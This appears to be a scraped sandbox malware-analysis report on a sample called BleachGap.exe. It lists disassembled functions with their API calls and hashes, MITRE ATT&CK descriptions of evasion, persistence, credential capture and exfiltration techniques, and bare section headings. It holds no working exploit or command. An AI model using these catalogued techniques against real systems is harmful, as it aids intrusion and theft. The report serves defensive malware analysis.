Function 001B24CA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001B2520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 001B2549

Strings

<local>, xrefs: 001B2511

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 59b085a48a7aafe52afd549be37adf06234dc59e869176e5a00fcba57ebaa280
Instruction ID: 073dceb468c900302f1eb0219eccdcf1c74639d4e8b3c6ab9b174c2f7880f710
Opcode Fuzzy Hash: 59b085a48a7aafe52afd549be37adf06234dc59e869176e5a00fcba57ebaa280
Instruction Fuzzy Hash: A511C2B0501225BADB389F528C99EFBFF68FF06751F10822AF90556440D3706999DAF0

Uniqueness

Uniqueness Score: -1.00%

Function 001B80A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001B830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,001B80C8,?,00000000,?,?), ref: 001B8322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001B80CB
htons.WSOCK32(00000000,?,00000000), ref: 001B8108

Strings

255.255.255.255, xrefs: 001B80E3

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 00720e59b78c41fa6432263beda9f597333f30879a3cd254e94bfb877a8b61a4
Instruction ID: d3223baadd69b503e9ad00e15620cdf8ea5475bbc02c61790349a84a24e8b7e9
Opcode Fuzzy Hash: 00720e59b78c41fa6432263beda9f597333f30879a3cd254e94bfb877a8b61a4
Instruction Fuzzy Hash: 1611E174200309ABCB20AF68CC86FFDB769FF14720F10852AF91197292DB72A815C691

Uniqueness

Uniqueness Score: -1.00%

Function 00150A8D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00143C26,002062F8,?,?,?), ref: 00150ACE

Part of subcall function 00147D2C: _memmove.LIBCMT ref: 00147D66

_wcscat.LIBCMT ref: 001850E1

Strings

c , xrefs: 00150B0E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: c
API String ID: 257928180-2442103856
Opcode ID: c8101f01c01eadc7480c770f67606d4eacc2b59725d2acabdf538b4749faf53a
Instruction ID: 27498a1b2ccebbd0dc21f350961bdee366e1794d83b1071b5a5584099a8906ed
Opcode Fuzzy Hash: c8101f01c01eadc7480c770f67606d4eacc2b59725d2acabdf538b4749faf53a
Instruction Fuzzy Hash: 4B118E38A14208EACB01EBA4DC46ED977B9EF18355B0000A5B998DB291EB70DA988B51

Uniqueness

Uniqueness Score: -1.00%

Function 001992E7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00147F41: _memmove.LIBCMT ref: 00147F82

Part of subcall function 0019B0C4: GetClassNameW.USER32 ref: 0019B0E7

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00199355

Strings

ListBox, xrefs: 0019931F
ComboBox, xrefs: 001992F4

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: b973e1d521f04fbe896879fedeebec1d9bc07e6b7a42743a11dc70e46964702b
Instruction ID: 133d7f7800f89f7f2bc4954c29b1a814b0c06b989ef7155262c1fc49909a5016
Opcode Fuzzy Hash: b973e1d521f04fbe896879fedeebec1d9bc07e6b7a42743a11dc70e46964702b
Instruction Fuzzy Hash: CD015E71A45228ABCF08EFA4CC929FE7769BF66320B14061DB972572E2DB31590C8660

Uniqueness

Uniqueness Score: -1.00%

Function 001A901B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 001A9036
__fread_nolock.LIBCMT ref: 001A904B

Strings

EA06, xrefs: 001A907D

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 73fda7678e7606279cdb691aedacd88a1bc4897f5f64b92a7e921819c2a40575
Instruction ID: b525c0371253864393821e748ff21c2e130bb027f93241c6cc3330d3570833bc
Opcode Fuzzy Hash: 73fda7678e7606279cdb691aedacd88a1bc4897f5f64b92a7e921819c2a40575
Instruction Fuzzy Hash: A201F9718042187EDB28C7A8CC56EFE7BFC9B11301F00419AF552D2181E679A6148760

Uniqueness

Uniqueness Score: -1.00%

Function 001991DF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00147F41: _memmove.LIBCMT ref: 00147F82

Part of subcall function 0019B0C4: GetClassNameW.USER32 ref: 0019B0E7

SendMessageW.USER32(?,00000180,00000000,?), ref: 0019924D

Strings

ListBox, xrefs: 00199217
ComboBox, xrefs: 001991EC

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 3560daaf601e3573a00ba1aa379b9cb78eef45e467e011de456df76fe14d1cca
Instruction ID: 454f04ea56de6dd6f3d72436a925ebb5a3681e8aad652790caba2adc3b14f9b9
Opcode Fuzzy Hash: 3560daaf601e3573a00ba1aa379b9cb78eef45e467e011de456df76fe14d1cca
Instruction Fuzzy Hash: 23018871A4520877CF18E7A4C992EFF77AD9F55300F24001D7516672D1DB115E0C9671

Uniqueness

Uniqueness Score: -1.00%

Function 00199264, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00147F41: _memmove.LIBCMT ref: 00147F82

Part of subcall function 0019B0C4: GetClassNameW.USER32 ref: 0019B0E7

SendMessageW.USER32(?,00000182,?,00000000), ref: 001992D0

Strings

ListBox, xrefs: 0019929C
ComboBox, xrefs: 00199271

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: c0db0fcfc993011e527ef73f3443633c6ca644d17ba8ce4d17bc613c83ff0c97
Instruction ID: 15a0908629281e4595d45d46631b5750ca99af2b8e804f9e378bbe48f1fe17a1
Opcode Fuzzy Hash: c0db0fcfc993011e527ef73f3443633c6ca644d17ba8ce4d17bc613c83ff0c97
Instruction Fuzzy Hash: 8601A2B1E4521877CF04EBA4C982EFF77AC9F21300F240129B912632D2DB215E0C9271

Uniqueness

Uniqueness Score: -1.00%

Function 00166DAE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00166DD0
__calloc_crt.LIBCMT ref: 00166DE9

Strings

@R , xrefs: 00166E00

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: __calloc_crt
String ID: @R
API String ID: 3494438863-1010322380
Opcode ID: ea3aa6f20ca688747d12dc50ed84bd438b715568b86904be236c16b985b674c5
Instruction ID: 69ac7e2a816a02ed955da6b176d6226e63ec8684372a0630356312309c5fad1f
Opcode Fuzzy Hash: ea3aa6f20ca688747d12dc50ed84bd438b715568b86904be236c16b985b674c5
Instruction Fuzzy Hash: 2EF096713087169FF728DF98FD097A127D9EB10720F10052BFA40DB695EB7088B18684

Uniqueness

Uniqueness Score: -1.00%

Function 001A51CA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 001A51E8
_wcscmp.LIBCMT ref: 001A51FA

Strings

#32770, xrefs: 001A51F4

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 126f6cdb85f33fd95b7b7f79141cab1cb9ebdb4fbc8257f18eacd6cffb8d2b5a
Instruction ID: 2ba175ddce03a649be188519163a0e788147b305a84ecc80bb37fc247b5107fc
Opcode Fuzzy Hash: 126f6cdb85f33fd95b7b7f79141cab1cb9ebdb4fbc8257f18eacd6cffb8d2b5a
Instruction Fuzzy Hash: 6EE06872A0432C2BE3209B99AC09FA7FBACEF41731F00016BFD14D3040E670AA458BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001981BC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001981CA

Part of subcall function 00163598: _doexit.LIBCMT ref: 001635A2

Strings

Error allocating memory., xrefs: 001981C3
AutoIt, xrefs: 001981BE

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 961d0cf936acb96c34db55377671eeb44b027d41a3f7a656ff49c614fab44dcd
Instruction ID: 56363e36136e1600ecafda71b025ef37e5b63258d0d42c27d337ce37faa2c5fb
Opcode Fuzzy Hash: 961d0cf936acb96c34db55377671eeb44b027d41a3f7a656ff49c614fab44dcd
Instruction Fuzzy Hash: 6AD05B323C536C36D61433A86D07FC579484B25B51F144426BB08965D38FD199D252D9

Uniqueness

Uniqueness Score: -1.00%

Function 0017B511, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0017B564: _memset.LIBCMT ref: 0017B571

Part of subcall function 00160B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0017B540,?,?,?,0014100A), ref: 00160B89

IsDebuggerPresent.KERNEL32(?,?,?,0014100A), ref: 0017B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0014100A), ref: 0017B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0017B54E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: bc849cafa47d8bd248952b4b5ddb223421e9f43979ec6ff0813bdccac6aa54f4
Instruction ID: a43be29f1917e8b2c4f8916f89c1edc310f307e4e390a8954f710793db636306
Opcode Fuzzy Hash: bc849cafa47d8bd248952b4b5ddb223421e9f43979ec6ff0813bdccac6aa54f4
Instruction Fuzzy Hash: DAE06DB02047508FD321DF29E9487467BF4AF04B48F00C92CE44AC3661DBB4D445CBA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report BleachGap.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
